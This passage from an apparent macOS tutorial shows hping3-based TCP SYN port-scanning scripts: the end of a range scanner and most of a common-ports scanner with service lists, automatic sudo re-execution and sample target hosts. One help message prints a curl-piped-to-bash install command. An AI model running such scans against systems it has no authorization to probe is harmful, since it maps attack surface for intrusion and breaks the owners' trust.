        shift  # Remove the timeout value
        "$@"   # Execute the command directly
    }
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║        TCP SYN PORT SCANNER            ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}        $TARGET"
echo -e "  ${BLUE}Port Range:${NC}    $START_PORT - $END_PORT"
echo -e "  ${BLUE}Total Ports:${NC}   $TOTAL_PORTS"
echo -e "  ${BLUE}Threads:${NC}       $THREADS"
echo -e "  ${BLUE}Scan Type:${NC}     TCP SYN (Half-open)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Resolve target to IP
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting TCP SYN scan...${NC}"
echo -e "${YELLOW}[*] Scanning $TOTAL_PORTS ports with $THREADS parallel threads${NC}"
echo ""

# Progress tracking
SCANNED=0
JOBS_COUNT=0

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
    # Launch scan in background
    scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
    
    # Manage parallel jobs
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
        sleep 0.05
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_PORTS"
done

# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count results
OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0

if [ -f "$OPEN_PORTS_FILE" ]; then
    OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.closed" ]; then
    CLOSED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.closed" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.filtered" ]; then
    FILTERED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.filtered" | tr -d ' ')
fi

# Display open ports
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
    echo ""
    echo -e "${MAGENTA}Open Ports:${NC}"
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    printf "${WHITE}%-10s %-15s %s${NC}\n" "PORT" "STATE" "SERVICE"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Sort and display open ports
    sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
        printf "${GREEN}%-10s${NC} ${GREEN}%-15s${NC} ${YELLOW}%s${NC}\n" "$port/tcp" "$state" "$service"
    done
    
    # Save detailed report
    REPORT_FILE="tcp_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "TCP SYN Scan Report"
        echo "==================="
        echo "Target: $TARGET ($TARGET_IP)"
        echo "Port Range: $START_PORT - $END_PORT"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo "Scan Rate: $(( TOTAL_PORTS / (DURATION + 1) )) ports/second"
        echo ""
        echo "Results Summary:"
        echo "----------------"
        echo "Open ports: $OPEN_COUNT"
        echo "Closed ports: $CLOSED_COUNT"
        echo "Filtered ports: $FILTERED_COUNT"
        echo ""
        echo "Open Ports Detail:"
        echo "------------------"
        sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
            printf "%-10s %-15s %s\n" "$port/tcp" "$state" "$service"
        done
    } > "$REPORT_FILE"
    
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}[*] Detailed report saved to: $REPORT_FILE${NC}"
else
    echo -e "${YELLOW}[-] No open ports found in the specified range${NC}"
    echo -e "${YELLOW}    Possible reasons:${NC}"
    echo -e "${YELLOW}    • All ports are closed or filtered${NC}"
    echo -e "${YELLOW}    • Firewall is blocking SYN packets${NC}"
    echo -e "${YELLOW}    • Target is down or unreachable${NC}"
fi

# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Ports Scanned:${NC}  $TOTAL_PORTS"
echo -e "  ${GREEN}Open:${NC}           $OPEN_COUNT"
echo -e "  ${RED}Closed:${NC}         $CLOSED_COUNT"
echo -e "  ${YELLOW}Filtered:${NC}       $FILTERED_COUNT"
echo -e "  ${BLUE}Scan Duration:${NC}  ${DURATION} seconds"
echo -e "  ${BLUE}Scan Rate:${NC}      ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./tcp_syn_scan.sh

How to Run:

# Scan default ports 1-1000
./tcp_syn_scan.sh example.com

# Scan specific range
./tcp_syn_scan.sh 192.168.1.1 1 100

# Quick scan of common services
./tcp_syn_scan.sh server.local 20 445

# Full port scan with 100 threads
./tcp_syn_scan.sh example.com 1 65535 100

# Scan web ports
./tcp_syn_scan.sh webserver.com 80 443

# Scan database ports
./tcp_syn_scan.sh dbserver.com 3300 3400

# Get help
./tcp_syn_scan.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to scan
– **start_port** (optional, default: 1): First port in the range to scan
– **end_port** (optional, default: 1000): Last port in the range to scan
– **threads** (optional, default: 50): Number of parallel scan jobs (1-500)
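
The "threads" here are plain background shell jobs: each probe is launched with "&" and the loop pauses whenever the number of running jobs reaches the limit. A minimal sketch of the same throttling pattern (do_work is a placeholder):

THREADS=50
for port in $(seq 1 1000); do
    do_work "$port" &                          # launch probe in the background
    while [ "$(jobs -r | wc -l)" -ge "$THREADS" ]; do
        sleep 0.05                             # wait until a job slot frees up
    done
done
wait                                           # collect the remaining jobs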

Script 5: Common Ports Scanner

Purpose:
Scans a predefined list of commonly used ports with service identification. This is more efficient than scanning large port ranges when looking for standard services.
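
For scale, the default category below probes just 15 ports, compared with the 1,000-port default sweep of the range scanner above, so a category scan typically finishes in a few seconds.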

Create the Script:

# Install GNU coreutils first (provides the gtimeout command used by the script)
brew install coreutils

cat > ./common_ports_scan.sh << 'EOF'
#!/bin/zsh

# Common Ports Scanner using hping3
# Scans commonly used ports with predefined or custom port lists
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
SCAN_TYPE="${2:-default}"
CUSTOM_PORTS="$3"
THREADS="${4:-50}"

# Port categories
declare -A PORT_CATEGORIES=(
    ["default"]="21,22,23,25,53,80,110,143,443,445,3306,3389,5432,8080,8443"
    ["web"]="80,443,8080,8443,8000,8888,3000,5000,9000"
    ["mail"]="25,110,143,465,587,993,995"
    ["database"]="1433,1521,3306,5432,5984,6379,7000,7001,8086,9042,9200,11211,27017"
    ["remote"]="22,23,3389,5900,5901,5902"
    ["file"]="20,21,69,139,445,873,2049"
    ["top100"]="7,9,13,21,22,23,25,26,37,53,79,80,81,88,106,110,111,113,119,135,139,143,144,179,199,389,427,443,444,445,465,513,514,515,543,544,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1029,1110,1433,1521,1701,1720,1723,1755,1900,2000,2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6001,6379,6646,7000,7070,8000,8008,8009,8080,8081,8443,8888,9100,9200,9999,10000,27017,32768,49152,49153,49154,49155,49156,49157"
    ["top1000"]="1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6379,6389,6502,6510,6543,6547,6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090
,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,9300,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11211,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27017,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"
)

# Service mapping
declare -A SERVICE_NAMES=(
    [20]="FTP-Data"
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [67]="DHCP"
    [68]="DHCP"
    [69]="TFTP"
    [80]="HTTP"
    [110]="POP3"
    [123]="NTP"
    [135]="MSRPC"
    [137]="NetBIOS-NS"
    [138]="NetBIOS-DGM"
    [139]="NetBIOS-SSN"
    [143]="IMAP"
    [161]="SNMP"
    [162]="SNMP-Trap"
    [389]="LDAP"
    [443]="HTTPS"
    [445]="SMB"
    [465]="SMTPS"
    [514]="Syslog"
    [515]="LPD"
    [587]="SMTP-TLS"
    [636]="LDAPS"
    [873]="Rsync"
    [993]="IMAPS"
    [995]="POP3S"
    [1433]="MSSQL"
    [1521]="Oracle"
    [1723]="PPTP"
    [2049]="NFS"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [5900]="VNC"
    [5984]="CouchDB"
    [6379]="Redis"
    [7000]="Cassandra"
    [8000]="HTTP-Alt"
    [8080]="HTTP-Proxy"
    [8086]="InfluxDB"
    [8443]="HTTPS-Alt"
    [8888]="HTTP-Alt2"
    [9000]="SonarQube"
    [9042]="Cassandra-CQL"
    [9200]="Elasticsearch"
    [11211]="Memcached"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./common_ports_scan.sh"
    echo "Usage: $script_name <target> [scan_type|custom_ports] [threads]"
    echo ""
    echo "Scan Types:"
    echo "  default    - Top 15 most common ports (default)"
    echo "  web        - Web server ports (80, 443, 8080, etc.)"
    echo "  mail       - Mail server ports (25, 110, 143, etc.)"
    echo "  database   - Database ports (MySQL, PostgreSQL, MongoDB, etc.)"
    echo "  remote     - Remote access ports (SSH, RDP, VNC, etc.)"
    echo "  file       - File sharing ports (FTP, SMB, NFS, etc.)"
    echo "  top100     - Top 100 most common ports"
    echo "  top1000    - Top 1000 most common ports"
    echo "  custom     - Specify custom ports as comma-separated list"
    echo ""
    echo "Parameters:"
    echo "  target     - Hostname or IP address to scan"
    echo "  scan_type  - Type of scan or comma-separated port list"
    echo "  threads    - Number of parallel threads (default: 50)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                    # Scan default ports"
    echo "  $script_name example.com web                # Scan web ports"
    echo "  $script_name example.com database           # Scan database ports"
    echo "  $script_name example.com top100             # Scan top 100 ports"
    echo "  $script_name example.com \"22,80,443,3306\"   # Custom ports"
    echo "  $script_name example.com top1000 100        # Top 1000 with 100 threads"
}

# Function to get service name
get_service_name() {
    local port=$1
    if [[ -n "${SERVICE_NAMES[$port]}" ]]; then
        echo "${SERVICE_NAMES[$port]}"
    else
        # Try to get from system services
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "Unknown"
        fi
    fi
}

# Function to scan a single port
scan_port() {
    local target=$1
    local port=$2
    local tmpfile=$3
    
    # Run hping3 with timeout
    local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null || true)
    
    if echo "$result" | grep -q "flags=SA"; then
        # Port is open (SYN+ACK received)
        local service=$(get_service_name "$port")
        echo "$port:$service" >> "$tmpfile"
        echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Determine ports to scan
if [[ "$SCAN_TYPE" =~ ^[0-9,]+$ ]]; then
    # Custom ports provided
    PORTS_TO_SCAN="$SCAN_TYPE"
    SCAN_DESCRIPTION="Custom ports"
elif [[ -n "${PORT_CATEGORIES[$SCAN_TYPE]}" ]]; then
    # Predefined category
    PORTS_TO_SCAN="${PORT_CATEGORIES[$SCAN_TYPE]}"
    SCAN_DESCRIPTION="$SCAN_TYPE ports"
else
    # Invalid scan type, use default
    PORTS_TO_SCAN="${PORT_CATEGORIES[default]}"
    SCAN_DESCRIPTION="Default common ports"
    if [[ -n "$SCAN_TYPE" ]] && [[ "$SCAN_TYPE" != "default" ]]; then
        echo -e "${YELLOW}Warning: Unknown scan type '$SCAN_TYPE', using default${NC}"
    fi
fi

# Parse threads parameter (a purely numeric third argument is the thread count)
if [[ -n "$CUSTOM_PORTS" ]] && [[ "$CUSTOM_PORTS" =~ ^[0-9]+$ ]]; then
    THREADS="$CUSTOM_PORTS"
fi

# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
    THREADS=50
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check for timeout command and create appropriate wrapper
if command -v gtimeout &> /dev/null; then
    # macOS with coreutils installed
    timeout() {
        gtimeout "$@"
    }
elif command -v timeout &> /dev/null; then
    # Linux or other systems with timeout
    timeout() {
        command timeout "$@"
    }
else
    # No timeout command available
    echo -e "${YELLOW}Warning: timeout command not found${NC}"
    echo "Install with: brew install coreutils"
    echo "Continuing without timeout protection..."
    echo ""
    timeout() {
        shift  # Remove timeout value
        "$@"   # Execute command directly
    }
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Convert ports to array (zsh comma-split, without permanently changing IFS)
PORT_ARRAY=(${(s:,:)PORTS_TO_SCAN})
TOTAL_PORTS=${#PORT_ARRAY[@]}

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║      COMMON PORTS SCANNER              ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}      $TARGET"
echo -e "  ${BLUE}Scan Type:${NC}   $SCAN_DESCRIPTION"
echo -e "  ${BLUE}Total Ports:${NC} $TOTAL_PORTS"
echo -e "  ${BLUE}Threads:${NC}     $THREADS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting scan of $TOTAL_PORTS common ports...${NC}"
echo ""

# Progress tracking
SCANNED=0

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    if [ "$total" -eq 0 ]; then
        return
    fi
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
for port in "${PORT_ARRAY[@]}"; do
    # Remove any whitespace
    port=$(echo "$port" | tr -d ' ')
    
    # Launch scan in background
    scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
    
    # Manage parallel jobs
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
        sleep 0.05
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_PORTS"
done

# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count open ports
OPEN_COUNT=0
if [ -f "$OPEN_PORTS_FILE" ]; then
    OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi

# Display results
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
    echo ""
    echo -e "${MAGENTA}Open Ports Summary:${NC}"
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    printf "${WHITE}%-10s %-20s${NC}\n" "PORT" "SERVICE"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Sort and display open ports
    sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
        printf "${GREEN}%-10s${NC} ${YELLOW}%-20s${NC}\n" "$port/tcp" "$service"
    done
    
    # Group by service type
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${MAGENTA}Services by Category:${NC}"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Categorize services
    WEB_PORTS=""
    MAIL_PORTS=""
    DB_PORTS=""
    REMOTE_PORTS=""
    FILE_PORTS=""
    OTHER_PORTS=""
    
    while IFS=: read -r port service; do
        case $port in
            80|443|8080|8443|8000|8888|3000|5000|9000)
                WEB_PORTS="${WEB_PORTS}${port}($service) "
                ;;
            25|110|143|465|587|993|995)
                MAIL_PORTS="${MAIL_PORTS}${port}($service) "
                ;;
            1433|1521|3306|5432|6379|7000|9200|11211|27017)
                DB_PORTS="${DB_PORTS}${port}($service) "
                ;;
            22|23|3389|5900|5901|5902)
                REMOTE_PORTS="${REMOTE_PORTS}${port}($service) "
                ;;
            20|21|69|139|445|873|2049)
                FILE_PORTS="${FILE_PORTS}${port}($service) "
                ;;
            *)
                OTHER_PORTS="${OTHER_PORTS}${port}($service) "
                ;;
        esac
    done < "$OPEN_PORTS_FILE"
    
    [[ -n "$WEB_PORTS" ]] && echo -e "${BLUE}Web Services:${NC} $WEB_PORTS"
    [[ -n "$MAIL_PORTS" ]] && echo -e "${BLUE}Mail Services:${NC} $MAIL_PORTS"
    [[ -n "$DB_PORTS" ]] && echo -e "${BLUE}Database Services:${NC} $DB_PORTS"
    [[ -n "$REMOTE_PORTS" ]] && echo -e "${BLUE}Remote Access:${NC} $REMOTE_PORTS"
    [[ -n "$FILE_PORTS" ]] && echo -e "${BLUE}File Services:${NC} $FILE_PORTS"
    [[ -n "$OTHER_PORTS" ]] && echo -e "${BLUE}Other Services:${NC} $OTHER_PORTS"
    
    # Save report
    REPORT_FILE="common_ports_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "Common Ports Scan Report"
        echo "========================"
        echo "Target: $TARGET ($TARGET_IP)"
        echo "Scan Type: $SCAN_DESCRIPTION"
        echo "Total Ports Scanned: $TOTAL_PORTS"
        echo "Open Ports Found: $OPEN_COUNT"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo ""
        echo "Open Ports:"
        echo "-----------"
        sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
            printf "%-10s %s\n" "$port/tcp" "$service"
        done
    } > "$REPORT_FILE"
    
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
else
    echo -e "${YELLOW}[-] No open ports found${NC}"
    echo -e "${YELLOW}    Possible reasons:${NC}"
    echo -e "${YELLOW}    • All scanned ports are closed${NC}"
    echo -e "${YELLOW}    • Firewall is blocking connections${NC}"
    echo -e "${YELLOW}    • Target is down or unreachable${NC}"
fi

# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Ports Scanned:${NC}  $TOTAL_PORTS"
echo -e "  ${GREEN}Open Ports:${NC}     $OPEN_COUNT"
if [ "$TOTAL_PORTS" -gt 0 ]; then
    echo -e "  ${RED}Success Rate:${NC}   $(( OPEN_COUNT * 100 / TOTAL_PORTS ))%"
else
    echo -e "  ${RED}Success Rate:${NC}   N/A"
fi
echo -e "  ${BLUE}Scan Duration:${NC}  ${DURATION} seconds"
if [ "$TOTAL_PORTS" -gt 0 ]; then
    echo -e "  ${BLUE}Scan Rate:${NC}      ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
else
    echo -e "  ${BLUE}Scan Rate:${NC}      N/A"
fi
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Provide recommendations
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo ""
    echo -e "${YELLOW}Security Recommendations:${NC}"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Check for risky services
    if grep -q "23:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${RED}⚠ Telnet (port 23) is insecure - use SSH instead${NC}"
    fi
    if grep -q "21:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ FTP (port 21) transmits credentials in plaintext${NC}"
